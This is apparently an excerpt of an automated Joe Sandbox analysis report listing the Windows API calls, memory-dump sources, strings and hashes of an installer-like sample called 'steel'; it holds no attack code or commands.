                                                                                              • Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 0045322A
                                                                                              • Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
                                                                                              • Part of subcall function 004570B4: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004570D8
                                                                                              • Part of subcall function 004645F4: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498C1A), ref: 00464603
                                                                                              • Part of subcall function 004645F4: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464609
                                                                                              • Part of subcall function 0046CDF0: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CE05
                                                                                              • Part of subcall function 00478C20: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498C24), ref: 00478C26
                                                                                              • Part of subcall function 00478C20: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478C33
                                                                                              • Part of subcall function 00478C20: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478C43
                                                                                              • Part of subcall function 00483F88: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00484077
                                                                                              • Part of subcall function 00495BB4: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 00495BCD
                                                                                            • SetErrorMode.KERNEL32(00000001,00000000,00498C6C), ref: 00498C3E
                                                                                              • Part of subcall function 00498968: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498C48,00000001,00000000,00498C6C), ref: 00498972
                                                                                              • Part of subcall function 00498968: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498978
                                                                                              • Part of subcall function 004244D4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 004244F3
                                                                                              • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                            • ShowWindow.USER32(?,00000005,00000000,00498C6C), ref: 00498C9F
                                                                                              • Part of subcall function 004825C8: SetActiveWindow.USER32(?), ref: 00482676
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorF551FormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
                                                                                            • String ID: Setup
                                                                                            • API String ID: 3870281231-3839654196
                                                                                            • Opcode ID: 1594606edc507442c6549f9e4ebdc225aad6ad90dc9fc57b5479ce1c0ac5814d
                                                                                            • Instruction ID: b535e719d7157e93998cc10f536158ae488692691c8c4e2dacdcbf5c7207fd3e
                                                                                            • Opcode Fuzzy Hash: 1594606edc507442c6549f9e4ebdc225aad6ad90dc9fc57b5479ce1c0ac5814d
                                                                                            • Instruction Fuzzy Hash: 873104312446409FD601BBBBFD5392D3B94EF8A728B91447FF80496693DE3C68508A7E
                                                                                            APIs
                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DD38), ref: 0042DC3C
                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DD38), ref: 0042DCAC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: QueryValue
                                                                                            • String ID: $=H
                                                                                            • API String ID: 3660427363-3538597426
                                                                                            • Opcode ID: b62dc44b296d1c54c0416b8d239270b5fe200a79a82432283709fd1da487490f
                                                                                            • Instruction ID: 5bd1c55a509b6dee259ffcee94d68868fe84ce326e73fb4cf6662c4527ef549e
                                                                                            • Opcode Fuzzy Hash: b62dc44b296d1c54c0416b8d239270b5fe200a79a82432283709fd1da487490f
                                                                                            • Instruction Fuzzy Hash: 9D414171E00529ABDB11DF95D881BAFB7B8EB04704F918466E810F7241D778AE00CBA5
                                                                                            APIs
                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453B13,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A6A
                                                                                            • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453B13,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A73
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                            • String ID: .tmp
                                                                                            • API String ID: 1375471231-2986845003
                                                                                            • Opcode ID: 4f6049b6d10a737b279f92eac6e2edda550f3c0c3ab583747f9ca22f4cbd9d09
                                                                                            • Instruction ID: 2c169793aa1d4e8b0ae54453200dd0eeecd34c8d921a2c5b894f13e1de3ec917
                                                                                            • Opcode Fuzzy Hash: 4f6049b6d10a737b279f92eac6e2edda550f3c0c3ab583747f9ca22f4cbd9d09
                                                                                            • Instruction Fuzzy Hash: BD213575A002089BDB01EFA5C8429DEB7B8EF49305F50457BE801B7343DA3CAF058B69
                                                                                            APIs
                                                                                              • Part of subcall function 00483A7C: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483A8D
                                                                                              • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483A9A
                                                                                              • Part of subcall function 00483A7C: GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483AA8
                                                                                              • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483AB0
                                                                                              • Part of subcall function 00483A7C: GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483ABC
                                                                                              • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483ADD
                                                                                              • Part of subcall function 00483A7C: GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483AF0
                                                                                              • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483AF6
                                                                                              • Part of subcall function 00483DA8: GetVersionExA.KERNEL32(?,00483FBA,00000000,0048408F,?,?,?,?,?,00498C29), ref: 00483DB6
                                                                                              • Part of subcall function 00483DA8: GetVersionExA.KERNEL32(0000009C,?,00483FBA,00000000,0048408F,?,?,?,?,?,00498C29), ref: 00483E08
                                                                                              • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                              • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                            • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00484077
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleModuleVersion$CurrentErrorInfoLibraryLoadModeNativeProcessSystem
                                                                                            • String ID: SHGetKnownFolderPath$shell32.dll
                                                                                            • API String ID: 3869789854-2936008475
                                                                                            • Opcode ID: 24bfbd8baf235fcbd7404033d7799f009542697b8823181e059981251f96c700
                                                                                            • Instruction ID: 8066e8dcbdf9c94243579ba2519058cd674f052446347c20ec70bbddfecd8a90
                                                                                            • Opcode Fuzzy Hash: 24bfbd8baf235fcbd7404033d7799f009542697b8823181e059981251f96c700
                                                                                            • Instruction Fuzzy Hash: 1021F1B06103116AC700BFBE599611B3BA5EB9570C380893FF904DB391D77E68149B6E
                                                                                            APIs
                                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047C92C,00000000,0047C942), ref: 0047C63A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Close
                                                                                            • String ID: RegisteredOrganization$RegisteredOwner
                                                                                            • API String ID: 3535843008-1113070880
                                                                                            • Opcode ID: fe32ea5757c181cea0fad4739291adb7fe5cb56e5df920aee23c3361bee12acf
                                                                                            • Instruction ID: 97ba07fcc0924f8d698b93a4c32f8f7a3ceb81663af41ec066a5e596666b9838
                                                                                            • Opcode Fuzzy Hash: fe32ea5757c181cea0fad4739291adb7fe5cb56e5df920aee23c3361bee12acf
                                                                                            • Instruction Fuzzy Hash: F5F09060700204ABEB00D6A8ACD2BAA3769D750304F60907FA1058F382C679EE019B5C
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00475483), ref: 00475271
                                                                                            • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00475483), ref: 00475288
                                                                                              • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCreateErrorFileHandleLast
                                                                                            • String ID: CreateFile
                                                                                            • API String ID: 2528220319-823142352
                                                                                            • Opcode ID: 2c7b4fae504844472e6a07c4f0bcfda842c0d735d71c8af9ff6e211e096a353b
                                                                                            • Instruction ID: b0794b45f16520e4762b2717541816a935241bfc2e667b83be7f23d95be3de9d
                                                                                            • Opcode Fuzzy Hash: 2c7b4fae504844472e6a07c4f0bcfda842c0d735d71c8af9ff6e211e096a353b
                                                                                            • Instruction Fuzzy Hash: 99E06D702403447FEA10FA69CCC6F4A77989B04728F10C152BA48AF3E3C5B9FC808A58
                                                                                            APIs
                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Open
                                                                                            • String ID: System\CurrentControlSet\Control\Windows$;H
                                                                                            • API String ID: 71445658-2565060666
                                                                                            • Opcode ID: a11f376e1d034aeb0d9ae53f60934921bcd728bb93d306f1768079d63b1ffdfe
                                                                                            • Instruction ID: 60e43675bb36a9eef4a15598a1848ca3f705ecc445ee8c9fe52fc6b05f1352bb
                                                                                            • Opcode Fuzzy Hash: a11f376e1d034aeb0d9ae53f60934921bcd728bb93d306f1768079d63b1ffdfe
                                                                                            • Instruction Fuzzy Hash: 29D09E72950128BB9B009A89DC41DFB775DDB15760F45441BF9049B141C5B4AC5197E4
                                                                                            APIs
                                                                                              • Part of subcall function 00457044: CoInitialize.OLE32(00000000), ref: 0045704A
                                                                                              • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                              • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                            • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004570D8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressErrorInitializeLibraryLoadModeProc
                                                                                            • String ID: SHCreateItemFromParsingName$shell32.dll
                                                                                            • API String ID: 2906209438-2320870614
                                                                                            • Opcode ID: 9d30f7af3022304e39d9007edb753d7b8512de14ad0f58a0e87bb64db50414c6
                                                                                            • Instruction ID: 7fba65882f7194314ab185764ebfac318737a269d5660949bdaf7135ffc1064c
                                                                                            • Opcode Fuzzy Hash: 9d30f7af3022304e39d9007edb753d7b8512de14ad0f58a0e87bb64db50414c6
                                                                                            • Instruction Fuzzy Hash: ECC08CA074860093CB40B3FA344320E1841AB8071FB10C07F7A04A66C7DE3C88088B2E
                                                                                            APIs
                                                                                              • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                              • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                            • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CE05
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressErrorLibraryLoadModeProc
                                                                                            • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                            • API String ID: 2492108670-2683653824
                                                                                            • Opcode ID: 4f35c33f472421c4948a2ce6cac4f72f28d005e98571f32e7a9733a845a9f857
                                                                                            • Instruction ID: c0603f0a452a360a01ce82207306765f02b8a986224f2e77b24b084cc810d505
                                                                                            • Opcode Fuzzy Hash: 4f35c33f472421c4948a2ce6cac4f72f28d005e98571f32e7a9733a845a9f857
                                                                                            • Instruction Fuzzy Hash: 44B092A060074086DB40B7A298D262B28269740319B20843BB0CC9BA95EB3E88240B9F
                                                                                            APIs
                                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,00448709), ref: 0044864C
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004486CD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressLibraryLoadProc
                                                                                            • String ID:
                                                                                            • API String ID: 2574300362-0
                                                                                            • Opcode ID: 36521cdfc13aba0ae9c44214f12a2e14552a0dd36018004eb1372d311063bccb
                                                                                            • Instruction ID: 2eaa58f6359003fef9dee836e3db1fa56ae38c906bc4f4c4d93ca6671f7cd4fb
                                                                                            • Opcode Fuzzy Hash: 36521cdfc13aba0ae9c44214f12a2e14552a0dd36018004eb1372d311063bccb
                                                                                            • Instruction Fuzzy Hash: 14515470E00105AFDB40EF95C491AAEBBF9EB45319F11817FE414BB391DA389E05CB99
                                                                                            APIs
                                                                                            • GetSystemMenu.USER32(00000000,00000000,00000000,00481DB4), ref: 00481D4C
                                                                                            • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00481D5D
                                                                                            • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00481D75
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$Append$System
                                                                                            • String ID:
                                                                                            • API String ID: 1489644407-0
                                                                                            • Opcode ID: 672145a2bbc7660003845448dd8fd579fca208d3c81716cd1fbd69936c4767aa
                                                                                            • Instruction ID: 44f8b16540ed1c6eecf525242fd074403e334eda66194076213ef08da8c10300
                                                                                            • Opcode Fuzzy Hash: 672145a2bbc7660003845448dd8fd579fca208d3c81716cd1fbd69936c4767aa
                                                                                            • Instruction Fuzzy Hash: 3431D4307043441AD721FB769C82BAE3A989F15318F54483FF901AB2E3CA7CAD09879D
                                                                                            APIs
                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424412
                                                                                            • TranslateMessage.USER32(?), ref: 0042448F
                                                                                            • DispatchMessageA.USER32(?), ref: 00424499
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message$DispatchPeekTranslate
                                                                                            • String ID:
                                                                                            • API String ID: 4217535847-0
                                                                                            • Opcode ID: d4f7142ddfb2041a0388c754ad29f8297397d1c5d5a6fc901d04af05902ad934
                                                                                            • Instruction ID: 8eae6dca0d2455523dd27ca57e4683f6da326f6f2f90499d04ddbfd693f83f9d
                                                                                            • Opcode Fuzzy Hash: d4f7142ddfb2041a0388c754ad29f8297397d1c5d5a6fc901d04af05902ad934
                                                                                            • Instruction Fuzzy Hash: E3116D303043205AEB20FA24A941B9F73D4DFC5758F80481EFC99972C2D77D9D49879A
                                                                                            APIs
                                                                                            • SetPropA.USER32(00000000,00000000), ref: 0041666A
                                                                                            • SetPropA.USER32(00000000,00000000), ref: 0041667F
                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 004166A6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Prop$Window
                                                                                            • String ID:
                                                                                            • API String ID: 3363284559-0
                                                                                            • Opcode ID: 953367bc10487f5f00132df45b9f4bdc07709d3a3f88142737615a1cc8063318
                                                                                            • Instruction ID: 6913c5f2d07602d921388148e43cadd8ab2d6729f30613f48e4cae6714e3bc13
                                                                                            • Opcode Fuzzy Hash: 953367bc10487f5f00132df45b9f4bdc07709d3a3f88142737615a1cc8063318
                                                                                            • Instruction Fuzzy Hash: ACF01271701210ABDB10AB599C85FA732DCAB09714F16057AB905EF286C778DC40C7A8
                                                                                            APIs
                                                                                            • IsWindowVisible.USER32(?), ref: 0041EE64
                                                                                            • IsWindowEnabled.USER32(?), ref: 0041EE6E
                                                                                            • EnableWindow.USER32(?,00000000), ref: 0041EE94
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$EnableEnabledVisible
                                                                                            • String ID:
                                                                                            • API String ID: 3234591441-0
                                                                                            • Opcode ID: 495d6a49dc4b54b7e424eeae3cce025a94256eba33976185de8149e812397146
                                                                                            • Instruction ID: 3b4cb379701a2ac24b7d0c87bf9454d2e26b3d0fb89a85d5a5a22e513a73856b
                                                                                            • Opcode Fuzzy Hash: 495d6a49dc4b54b7e424eeae3cce025a94256eba33976185de8149e812397146
                                                                                            • Instruction Fuzzy Hash: EAE06DB5100301AAE301AB2BDC81B5B7A9CAB54350F05843BA9089B292D63ADC408B7C
                                                                                            APIs
                                                                                            • SetActiveWindow.USER32(?), ref: 0046A02D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ActiveWindow
                                                                                            • String ID: PrepareToInstall
                                                                                            • API String ID: 2558294473-1101760603
